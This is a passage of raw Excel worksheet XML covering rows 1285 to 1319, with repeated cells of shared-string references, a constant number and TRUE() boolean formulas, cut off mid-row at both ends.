      <c r="J1285" t="s">
        <v>1620</v>
      </c>
      <c r="K1285">
        <v>0</v>
      </c>
      <c r="L1285" t="s">
        <v>98</v>
      </c>
      <c r="R1285" t="s">
        <v>5</v>
      </c>
      <c r="S1285" t="s">
        <v>1229</v>
      </c>
      <c r="T1285" t="s">
        <v>7</v>
      </c>
      <c r="U1285" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1286" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1286" s="1">
        <v>17654</v>
      </c>
      <c r="B1286" t="s">
        <v>0</v>
      </c>
      <c r="C1286" t="s">
        <v>78</v>
      </c>
      <c r="D1286" t="s">
        <v>1535</v>
      </c>
      <c r="E1286" t="s">
        <v>1227</v>
      </c>
      <c r="F1286">
        <v>29117302</v>
      </c>
      <c r="G1286" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1286" t="s">
        <v>1621</v>
      </c>
      <c r="K1286">
        <v>0</v>
      </c>
      <c r="L1286" t="s">
        <v>98</v>
      </c>
      <c r="R1286" t="s">
        <v>5</v>
      </c>
      <c r="S1286" t="s">
        <v>1229</v>
      </c>
      <c r="T1286" t="s">
        <v>7</v>
      </c>
      <c r="U1286" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1287" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1287" s="1">
        <v>17655</v>
      </c>
      <c r="B1287" t="s">
        <v>0</v>
      </c>
      <c r="C1287" t="s">
        <v>78</v>
      </c>
      <c r="D1287" t="s">
        <v>1535</v>
      </c>
      <c r="E1287" t="s">
        <v>1227</v>
      </c>
      <c r="F1287">
        <v>29117302</v>
      </c>
      <c r="G1287" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1287" t="s">
        <v>1622</v>
      </c>
      <c r="K1287">
        <v>0</v>
      </c>
      <c r="L1287" t="s">
        <v>98</v>
      </c>
      <c r="R1287" t="s">
        <v>5</v>
      </c>
      <c r="S1287" t="s">
        <v>1229</v>
      </c>
      <c r="T1287" t="s">
        <v>7</v>
      </c>
      <c r="U1287" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1288" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1288" s="1">
        <v>17656</v>
      </c>
      <c r="B1288" t="s">
        <v>0</v>
      </c>
      <c r="C1288" t="s">
        <v>78</v>
      </c>
      <c r="D1288" t="s">
        <v>1535</v>
      </c>
      <c r="E1288" t="s">
        <v>1227</v>
      </c>
      <c r="F1288">
        <v>29117302</v>
      </c>
      <c r="G1288" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1288" t="s">
        <v>1623</v>
      </c>
      <c r="K1288">
        <v>0</v>
      </c>
      <c r="L1288" t="s">
        <v>98</v>
      </c>
      <c r="R1288" t="s">
        <v>5</v>
      </c>
      <c r="S1288" t="s">
        <v>1229</v>
      </c>
      <c r="T1288" t="s">
        <v>7</v>
      </c>
      <c r="U1288" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1289" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1289" s="1">
        <v>17657</v>
      </c>
      <c r="B1289" t="s">
        <v>0</v>
      </c>
      <c r="C1289" t="s">
        <v>78</v>
      </c>
      <c r="D1289" t="s">
        <v>1535</v>
      </c>
      <c r="E1289" t="s">
        <v>1227</v>
      </c>
      <c r="F1289">
        <v>29117302</v>
      </c>
      <c r="G1289" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1289" t="s">
        <v>1624</v>
      </c>
      <c r="K1289">
        <v>0</v>
      </c>
      <c r="L1289" t="s">
        <v>98</v>
      </c>
      <c r="R1289" t="s">
        <v>5</v>
      </c>
      <c r="S1289" t="s">
        <v>1229</v>
      </c>
      <c r="T1289" t="s">
        <v>7</v>
      </c>
      <c r="U1289" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1290" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1290" s="1">
        <v>17658</v>
      </c>
      <c r="B1290" t="s">
        <v>0</v>
      </c>
      <c r="C1290" t="s">
        <v>78</v>
      </c>
      <c r="D1290" t="s">
        <v>1535</v>
      </c>
      <c r="E1290" t="s">
        <v>1227</v>
      </c>
      <c r="F1290">
        <v>29117302</v>
      </c>
      <c r="G1290" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1290" t="s">
        <v>1625</v>
      </c>
      <c r="K1290">
        <v>0</v>
      </c>
      <c r="L1290" t="s">
        <v>98</v>
      </c>
      <c r="R1290" t="s">
        <v>5</v>
      </c>
      <c r="S1290" t="s">
        <v>1229</v>
      </c>
      <c r="T1290" t="s">
        <v>7</v>
      </c>
      <c r="U1290" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1291" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1291" s="1">
        <v>17659</v>
      </c>
      <c r="B1291" t="s">
        <v>0</v>
      </c>
      <c r="C1291" t="s">
        <v>78</v>
      </c>
      <c r="D1291" t="s">
        <v>1535</v>
      </c>
      <c r="E1291" t="s">
        <v>1227</v>
      </c>
      <c r="F1291">
        <v>29117302</v>
      </c>
      <c r="G1291" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1291" t="s">
        <v>1626</v>
      </c>
      <c r="K1291">
        <v>0</v>
      </c>
      <c r="L1291" t="s">
        <v>98</v>
      </c>
      <c r="R1291" t="s">
        <v>5</v>
      </c>
      <c r="S1291" t="s">
        <v>1229</v>
      </c>
      <c r="T1291" t="s">
        <v>7</v>
      </c>
      <c r="U1291" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1292" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1292" s="1">
        <v>17660</v>
      </c>
      <c r="B1292" t="s">
        <v>0</v>
      </c>
      <c r="C1292" t="s">
        <v>78</v>
      </c>
      <c r="D1292" t="s">
        <v>1535</v>
      </c>
      <c r="E1292" t="s">
        <v>1227</v>
      </c>
      <c r="F1292">
        <v>29117302</v>
      </c>
      <c r="G1292" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1292" t="s">
        <v>1627</v>
      </c>
      <c r="K1292">
        <v>0</v>
      </c>
      <c r="L1292" t="s">
        <v>98</v>
      </c>
      <c r="R1292" t="s">
        <v>5</v>
      </c>
      <c r="S1292" t="s">
        <v>1229</v>
      </c>
      <c r="T1292" t="s">
        <v>7</v>
      </c>
      <c r="U1292" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1293" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1293" s="1">
        <v>17661</v>
      </c>
      <c r="B1293" t="s">
        <v>0</v>
      </c>
      <c r="C1293" t="s">
        <v>78</v>
      </c>
      <c r="D1293" t="s">
        <v>1535</v>
      </c>
      <c r="E1293" t="s">
        <v>1227</v>
      </c>
      <c r="F1293">
        <v>29117302</v>
      </c>
      <c r="G1293" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1293" t="s">
        <v>1628</v>
      </c>
      <c r="K1293">
        <v>0</v>
      </c>
      <c r="L1293" t="s">
        <v>98</v>
      </c>
      <c r="R1293" t="s">
        <v>5</v>
      </c>
      <c r="S1293" t="s">
        <v>1229</v>
      </c>
      <c r="T1293" t="s">
        <v>7</v>
      </c>
      <c r="U1293" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1294" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1294" s="1">
        <v>17662</v>
      </c>
      <c r="B1294" t="s">
        <v>0</v>
      </c>
      <c r="C1294" t="s">
        <v>78</v>
      </c>
      <c r="D1294" t="s">
        <v>1535</v>
      </c>
      <c r="E1294" t="s">
        <v>1227</v>
      </c>
      <c r="F1294">
        <v>29117302</v>
      </c>
      <c r="G1294" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1294" t="s">
        <v>1629</v>
      </c>
      <c r="K1294">
        <v>0</v>
      </c>
      <c r="L1294" t="s">
        <v>98</v>
      </c>
      <c r="R1294" t="s">
        <v>5</v>
      </c>
      <c r="S1294" t="s">
        <v>1229</v>
      </c>
      <c r="T1294" t="s">
        <v>7</v>
      </c>
      <c r="U1294" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1295" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1295" s="1">
        <v>17663</v>
      </c>
      <c r="B1295" t="s">
        <v>0</v>
      </c>
      <c r="C1295" t="s">
        <v>78</v>
      </c>
      <c r="D1295" t="s">
        <v>1535</v>
      </c>
      <c r="E1295" t="s">
        <v>1227</v>
      </c>
      <c r="F1295">
        <v>29117302</v>
      </c>
      <c r="G1295" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1295" t="s">
        <v>1630</v>
      </c>
      <c r="K1295">
        <v>0</v>
      </c>
      <c r="L1295" t="s">
        <v>98</v>
      </c>
      <c r="R1295" t="s">
        <v>5</v>
      </c>
      <c r="S1295" t="s">
        <v>1229</v>
      </c>
      <c r="T1295" t="s">
        <v>7</v>
      </c>
      <c r="U1295" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1296" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1296" s="1">
        <v>17664</v>
      </c>
      <c r="B1296" t="s">
        <v>0</v>
      </c>
      <c r="C1296" t="s">
        <v>78</v>
      </c>
      <c r="D1296" t="s">
        <v>1535</v>
      </c>
      <c r="E1296" t="s">
        <v>1227</v>
      </c>
      <c r="F1296">
        <v>29117302</v>
      </c>
      <c r="G1296" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1296" t="s">
        <v>1631</v>
      </c>
      <c r="K1296">
        <v>0</v>
      </c>
      <c r="L1296" t="s">
        <v>98</v>
      </c>
      <c r="R1296" t="s">
        <v>5</v>
      </c>
      <c r="S1296" t="s">
        <v>1229</v>
      </c>
      <c r="T1296" t="s">
        <v>7</v>
      </c>
      <c r="U1296" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1297" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1297" s="1">
        <v>17665</v>
      </c>
      <c r="B1297" t="s">
        <v>0</v>
      </c>
      <c r="C1297" t="s">
        <v>78</v>
      </c>
      <c r="D1297" t="s">
        <v>1535</v>
      </c>
      <c r="E1297" t="s">
        <v>1227</v>
      </c>
      <c r="F1297">
        <v>29117302</v>
      </c>
      <c r="G1297" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1297" t="s">
        <v>1632</v>
      </c>
      <c r="K1297">
        <v>0</v>
      </c>
      <c r="L1297" t="s">
        <v>98</v>
      </c>
      <c r="R1297" t="s">
        <v>5</v>
      </c>
      <c r="S1297" t="s">
        <v>1229</v>
      </c>
      <c r="T1297" t="s">
        <v>7</v>
      </c>
      <c r="U1297" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1298" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1298" s="1">
        <v>17666</v>
      </c>
      <c r="B1298" t="s">
        <v>0</v>
      </c>
      <c r="C1298" t="s">
        <v>78</v>
      </c>
      <c r="D1298" t="s">
        <v>1535</v>
      </c>
      <c r="E1298" t="s">
        <v>1227</v>
      </c>
      <c r="F1298">
        <v>29117302</v>
      </c>
      <c r="G1298" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1298" t="s">
        <v>1633</v>
      </c>
      <c r="K1298">
        <v>0</v>
      </c>
      <c r="L1298" t="s">
        <v>98</v>
      </c>
      <c r="R1298" t="s">
        <v>5</v>
      </c>
      <c r="S1298" t="s">
        <v>1229</v>
      </c>
      <c r="T1298" t="s">
        <v>7</v>
      </c>
      <c r="U1298" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1299" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1299" s="1">
        <v>17667</v>
      </c>
      <c r="B1299" t="s">
        <v>0</v>
      </c>
      <c r="C1299" t="s">
        <v>78</v>
      </c>
      <c r="D1299" t="s">
        <v>1535</v>
      </c>
      <c r="E1299" t="s">
        <v>1227</v>
      </c>
      <c r="F1299">
        <v>29117302</v>
      </c>
      <c r="G1299" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1299" t="s">
        <v>1634</v>
      </c>
      <c r="K1299">
        <v>0</v>
      </c>
      <c r="L1299" t="s">
        <v>98</v>
      </c>
      <c r="R1299" t="s">
        <v>5</v>
      </c>
      <c r="S1299" t="s">
        <v>1229</v>
      </c>
      <c r="T1299" t="s">
        <v>7</v>
      </c>
      <c r="U1299" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1300" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1300" s="1">
        <v>17668</v>
      </c>
      <c r="B1300" t="s">
        <v>0</v>
      </c>
      <c r="C1300" t="s">
        <v>78</v>
      </c>
      <c r="D1300" t="s">
        <v>1535</v>
      </c>
      <c r="E1300" t="s">
        <v>1227</v>
      </c>
      <c r="F1300">
        <v>29117302</v>
      </c>
      <c r="G1300" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1300" t="s">
        <v>1635</v>
      </c>
      <c r="K1300">
        <v>0</v>
      </c>
      <c r="L1300" t="s">
        <v>98</v>
      </c>
      <c r="R1300" t="s">
        <v>5</v>
      </c>
      <c r="S1300" t="s">
        <v>1229</v>
      </c>
      <c r="T1300" t="s">
        <v>7</v>
      </c>
      <c r="U1300" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1301" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1301" s="1">
        <v>17669</v>
      </c>
      <c r="B1301" t="s">
        <v>0</v>
      </c>
      <c r="C1301" t="s">
        <v>78</v>
      </c>
      <c r="D1301" t="s">
        <v>1535</v>
      </c>
      <c r="E1301" t="s">
        <v>1227</v>
      </c>
      <c r="F1301">
        <v>29117302</v>
      </c>
      <c r="G1301" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1301" t="s">
        <v>1636</v>
      </c>
      <c r="K1301">
        <v>0</v>
      </c>
      <c r="L1301" t="s">
        <v>98</v>
      </c>
      <c r="R1301" t="s">
        <v>5</v>
      </c>
      <c r="S1301" t="s">
        <v>1229</v>
      </c>
      <c r="T1301" t="s">
        <v>7</v>
      </c>
      <c r="U1301" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1302" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1302" s="1">
        <v>17670</v>
      </c>
      <c r="B1302" t="s">
        <v>0</v>
      </c>
      <c r="C1302" t="s">
        <v>78</v>
      </c>
      <c r="D1302" t="s">
        <v>1535</v>
      </c>
      <c r="E1302" t="s">
        <v>1227</v>
      </c>
      <c r="F1302">
        <v>29117302</v>
      </c>
      <c r="G1302" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1302" t="s">
        <v>1637</v>
      </c>
      <c r="K1302">
        <v>0</v>
      </c>
      <c r="L1302" t="s">
        <v>98</v>
      </c>
      <c r="R1302" t="s">
        <v>5</v>
      </c>
      <c r="S1302" t="s">
        <v>1229</v>
      </c>
      <c r="T1302" t="s">
        <v>7</v>
      </c>
      <c r="U1302" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1303" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1303" s="1">
        <v>17671</v>
      </c>
      <c r="B1303" t="s">
        <v>0</v>
      </c>
      <c r="C1303" t="s">
        <v>78</v>
      </c>
      <c r="D1303" t="s">
        <v>1535</v>
      </c>
      <c r="E1303" t="s">
        <v>1227</v>
      </c>
      <c r="F1303">
        <v>29117302</v>
      </c>
      <c r="G1303" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1303" t="s">
        <v>1638</v>
      </c>
      <c r="K1303">
        <v>0</v>
      </c>
      <c r="L1303" t="s">
        <v>98</v>
      </c>
      <c r="R1303" t="s">
        <v>5</v>
      </c>
      <c r="S1303" t="s">
        <v>1229</v>
      </c>
      <c r="T1303" t="s">
        <v>7</v>
      </c>
      <c r="U1303" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1304" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1304" s="1">
        <v>17672</v>
      </c>
      <c r="B1304" t="s">
        <v>0</v>
      </c>
      <c r="C1304" t="s">
        <v>78</v>
      </c>
      <c r="D1304" t="s">
        <v>1535</v>
      </c>
      <c r="E1304" t="s">
        <v>1227</v>
      </c>
      <c r="F1304">
        <v>29117302</v>
      </c>
      <c r="G1304" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1304" t="s">
        <v>1639</v>
      </c>
      <c r="K1304">
        <v>0</v>
      </c>
      <c r="L1304" t="s">
        <v>98</v>
      </c>
      <c r="R1304" t="s">
        <v>5</v>
      </c>
      <c r="S1304" t="s">
        <v>1229</v>
      </c>
      <c r="T1304" t="s">
        <v>7</v>
      </c>
      <c r="U1304" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1305" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1305" s="1">
        <v>17673</v>
      </c>
      <c r="B1305" t="s">
        <v>0</v>
      </c>
      <c r="C1305" t="s">
        <v>78</v>
      </c>
      <c r="D1305" t="s">
        <v>1535</v>
      </c>
      <c r="E1305" t="s">
        <v>1227</v>
      </c>
      <c r="F1305">
        <v>29117302</v>
      </c>
      <c r="G1305" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1305" t="s">
        <v>1640</v>
      </c>
      <c r="K1305">
        <v>0</v>
      </c>
      <c r="L1305" t="s">
        <v>98</v>
      </c>
      <c r="R1305" t="s">
        <v>5</v>
      </c>
      <c r="S1305" t="s">
        <v>1229</v>
      </c>
      <c r="T1305" t="s">
        <v>7</v>
      </c>
      <c r="U1305" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1306" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1306" s="1">
        <v>17674</v>
      </c>
      <c r="B1306" t="s">
        <v>0</v>
      </c>
      <c r="C1306" t="s">
        <v>78</v>
      </c>
      <c r="D1306" t="s">
        <v>1535</v>
      </c>
      <c r="E1306" t="s">
        <v>1227</v>
      </c>
      <c r="F1306">
        <v>29117302</v>
      </c>
      <c r="G1306" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1306" t="s">
        <v>1641</v>
      </c>
      <c r="K1306">
        <v>0</v>
      </c>
      <c r="L1306" t="s">
        <v>98</v>
      </c>
      <c r="R1306" t="s">
        <v>5</v>
      </c>
      <c r="S1306" t="s">
        <v>1229</v>
      </c>
      <c r="T1306" t="s">
        <v>7</v>
      </c>
      <c r="U1306" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1307" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1307" s="1">
        <v>17675</v>
      </c>
      <c r="B1307" t="s">
        <v>0</v>
      </c>
      <c r="C1307" t="s">
        <v>78</v>
      </c>
      <c r="D1307" t="s">
        <v>1535</v>
      </c>
      <c r="E1307" t="s">
        <v>1227</v>
      </c>
      <c r="F1307">
        <v>29117302</v>
      </c>
      <c r="G1307" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1307" t="s">
        <v>1642</v>
      </c>
      <c r="K1307">
        <v>0</v>
      </c>
      <c r="L1307" t="s">
        <v>98</v>
      </c>
      <c r="R1307" t="s">
        <v>5</v>
      </c>
      <c r="S1307" t="s">
        <v>1229</v>
      </c>
      <c r="T1307" t="s">
        <v>7</v>
      </c>
      <c r="U1307" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1308" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1308" s="1">
        <v>17676</v>
      </c>
      <c r="B1308" t="s">
        <v>0</v>
      </c>
      <c r="C1308" t="s">
        <v>78</v>
      </c>
      <c r="D1308" t="s">
        <v>1535</v>
      </c>
      <c r="E1308" t="s">
        <v>1227</v>
      </c>
      <c r="F1308">
        <v>29117302</v>
      </c>
      <c r="G1308" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1308" t="s">
        <v>1643</v>
      </c>
      <c r="K1308">
        <v>0</v>
      </c>
      <c r="L1308" t="s">
        <v>98</v>
      </c>
      <c r="R1308" t="s">
        <v>5</v>
      </c>
      <c r="S1308" t="s">
        <v>1229</v>
      </c>
      <c r="T1308" t="s">
        <v>7</v>
      </c>
      <c r="U1308" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1309" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1309" s="1">
        <v>17677</v>
      </c>
      <c r="B1309" t="s">
        <v>0</v>
      </c>
      <c r="C1309" t="s">
        <v>78</v>
      </c>
      <c r="D1309" t="s">
        <v>1535</v>
      </c>
      <c r="E1309" t="s">
        <v>1227</v>
      </c>
      <c r="F1309">
        <v>29117302</v>
      </c>
      <c r="G1309" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1309" t="s">
        <v>1644</v>
      </c>
      <c r="K1309">
        <v>0</v>
      </c>
      <c r="L1309" t="s">
        <v>98</v>
      </c>
      <c r="R1309" t="s">
        <v>5</v>
      </c>
      <c r="S1309" t="s">
        <v>1229</v>
      </c>
      <c r="T1309" t="s">
        <v>7</v>
      </c>
      <c r="U1309" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1310" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1310" s="1">
        <v>17678</v>
      </c>
      <c r="B1310" t="s">
        <v>0</v>
      </c>
      <c r="C1310" t="s">
        <v>78</v>
      </c>
      <c r="D1310" t="s">
        <v>1535</v>
      </c>
      <c r="E1310" t="s">
        <v>1227</v>
      </c>
      <c r="F1310">
        <v>29117302</v>
      </c>
      <c r="G1310" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1310" t="s">
        <v>1645</v>
      </c>
      <c r="K1310">
        <v>0</v>
      </c>
      <c r="L1310" t="s">
        <v>98</v>
      </c>
      <c r="R1310" t="s">
        <v>5</v>
      </c>
      <c r="S1310" t="s">
        <v>1229</v>
      </c>
      <c r="T1310" t="s">
        <v>7</v>
      </c>
      <c r="U1310" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1311" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1311" s="1">
        <v>17679</v>
      </c>
      <c r="B1311" t="s">
        <v>0</v>
      </c>
      <c r="C1311" t="s">
        <v>78</v>
      </c>
      <c r="D1311" t="s">
        <v>1535</v>
      </c>
      <c r="E1311" t="s">
        <v>1227</v>
      </c>
      <c r="F1311">
        <v>29117302</v>
      </c>
      <c r="G1311" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1311" t="s">
        <v>1646</v>
      </c>
      <c r="K1311">
        <v>0</v>
      </c>
      <c r="L1311" t="s">
        <v>98</v>
      </c>
      <c r="R1311" t="s">
        <v>5</v>
      </c>
      <c r="S1311" t="s">
        <v>1229</v>
      </c>
      <c r="T1311" t="s">
        <v>7</v>
      </c>
      <c r="U1311" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1312" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1312" s="1">
        <v>17680</v>
      </c>
      <c r="B1312" t="s">
        <v>0</v>
      </c>
      <c r="C1312" t="s">
        <v>78</v>
      </c>
      <c r="D1312" t="s">
        <v>1535</v>
      </c>
      <c r="E1312" t="s">
        <v>1227</v>
      </c>
      <c r="F1312">
        <v>29117302</v>
      </c>
      <c r="G1312" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1312" t="s">
        <v>1647</v>
      </c>
      <c r="K1312">
        <v>0</v>
      </c>
      <c r="L1312" t="s">
        <v>98</v>
      </c>
      <c r="R1312" t="s">
        <v>5</v>
      </c>
      <c r="S1312" t="s">
        <v>1229</v>
      </c>
      <c r="T1312" t="s">
        <v>7</v>
      </c>
      <c r="U1312" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1313" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1313" s="1">
        <v>17681</v>
      </c>
      <c r="B1313" t="s">
        <v>0</v>
      </c>
      <c r="C1313" t="s">
        <v>78</v>
      </c>
      <c r="D1313" t="s">
        <v>1535</v>
      </c>
      <c r="E1313" t="s">
        <v>1227</v>
      </c>
      <c r="F1313">
        <v>29117302</v>
      </c>
      <c r="G1313" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1313" t="s">
        <v>1648</v>
      </c>
      <c r="K1313">
        <v>0</v>
      </c>
      <c r="L1313" t="s">
        <v>98</v>
      </c>
      <c r="R1313" t="s">
        <v>5</v>
      </c>
      <c r="S1313" t="s">
        <v>1229</v>
      </c>
      <c r="T1313" t="s">
        <v>7</v>
      </c>
      <c r="U1313" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1314" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1314" s="1">
        <v>17682</v>
      </c>
      <c r="B1314" t="s">
        <v>0</v>
      </c>
      <c r="C1314" t="s">
        <v>78</v>
      </c>
      <c r="D1314" t="s">
        <v>1535</v>
      </c>
      <c r="E1314" t="s">
        <v>1227</v>
      </c>
      <c r="F1314">
        <v>29117302</v>
      </c>
      <c r="G1314" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1314" t="s">
        <v>1649</v>
      </c>
      <c r="K1314">
        <v>0</v>
      </c>
      <c r="L1314" t="s">
        <v>98</v>
      </c>
      <c r="R1314" t="s">
        <v>5</v>
      </c>
      <c r="S1314" t="s">
        <v>1229</v>
      </c>
      <c r="T1314" t="s">
        <v>7</v>
      </c>
      <c r="U1314" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1315" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1315" s="1">
        <v>17683</v>
      </c>
      <c r="B1315" t="s">
        <v>0</v>
      </c>
      <c r="C1315" t="s">
        <v>78</v>
      </c>
      <c r="D1315" t="s">
        <v>1535</v>
      </c>
      <c r="E1315" t="s">
        <v>1227</v>
      </c>
      <c r="F1315">
        <v>29117302</v>
      </c>
      <c r="G1315" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1315" t="s">
        <v>1650</v>
      </c>
      <c r="K1315">
        <v>0</v>
      </c>
      <c r="L1315" t="s">
        <v>98</v>
      </c>
      <c r="R1315" t="s">
        <v>5</v>
      </c>
      <c r="S1315" t="s">
        <v>1229</v>
      </c>
      <c r="T1315" t="s">
        <v>7</v>
      </c>
      <c r="U1315" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1316" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1316" s="1">
        <v>17684</v>
      </c>
      <c r="B1316" t="s">
        <v>0</v>
      </c>
      <c r="C1316" t="s">
        <v>78</v>
      </c>
      <c r="D1316" t="s">
        <v>1535</v>
      </c>
      <c r="E1316" t="s">
        <v>1227</v>
      </c>
      <c r="F1316">
        <v>29117302</v>
      </c>
      <c r="G1316" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1316" t="s">
        <v>1651</v>
      </c>
      <c r="K1316">
        <v>0</v>
      </c>
      <c r="L1316" t="s">
        <v>98</v>
      </c>
      <c r="R1316" t="s">
        <v>5</v>
      </c>
      <c r="S1316" t="s">
        <v>1229</v>
      </c>
      <c r="T1316" t="s">
        <v>7</v>
      </c>
      <c r="U1316" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1317" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1317" s="1">
        <v>17685</v>
      </c>
      <c r="B1317" t="s">
        <v>0</v>
      </c>
      <c r="C1317" t="s">
        <v>78</v>
      </c>
      <c r="D1317" t="s">
        <v>1535</v>
      </c>
      <c r="E1317" t="s">
        <v>1227</v>
      </c>
      <c r="F1317">
        <v>29117302</v>
      </c>
      <c r="G1317" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1317" t="s">
        <v>1652</v>
      </c>
      <c r="K1317">
        <v>0</v>
      </c>
      <c r="L1317" t="s">
        <v>98</v>
      </c>
      <c r="R1317" t="s">
        <v>5</v>
      </c>
      <c r="S1317" t="s">
        <v>1229</v>
      </c>
      <c r="T1317" t="s">
        <v>7</v>
      </c>
      <c r="U1317" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1318" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1318" s="1">
        <v>17686</v>
      </c>
      <c r="B1318" t="s">
        <v>0</v>
      </c>
      <c r="C1318" t="s">
        <v>78</v>
      </c>
      <c r="D1318" t="s">
        <v>1535</v>
      </c>
      <c r="E1318" t="s">
        <v>1227</v>
      </c>
      <c r="F1318">
        <v>29117302</v>
      </c>
      <c r="G1318" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1318" t="s">
        <v>1653</v>
      </c>
      <c r="K1318">
        <v>0</v>
      </c>
      <c r="L1318" t="s">
        <v>98</v>
      </c>
      <c r="R1318" t="s">
        <v>5</v>
      </c>
      <c r="S1318" t="s">
        <v>1229</v>
      </c>
      <c r="T1318" t="s">
        <v>7</v>
      </c>
      <c r="U1318" t="s">
        <v>56</v>
      </c>
    </row>
    <row r="1319" spans="1:21" x14ac:dyDescent="0.2">
      <c r="A1319" s="1">
        <v>17687</v>
      </c>
      <c r="B1319" t="s">
        <v>0</v>
      </c>
      <c r="C1319" t="s">
        <v>1</v>
      </c>
      <c r="D1319" t="s">
        <v>1535</v>
      </c>
      <c r="E1319" t="s">
        <v>1227</v>
      </c>
      <c r="F1319">
        <v>29117302</v>
      </c>
      <c r="G1319" t="b">
        <f>TRUE()</f>
        <v>1</v>
      </c>
      <c r="J1319" t="s">
        <v>1654</v>
      </c>
      <c r="K1319">
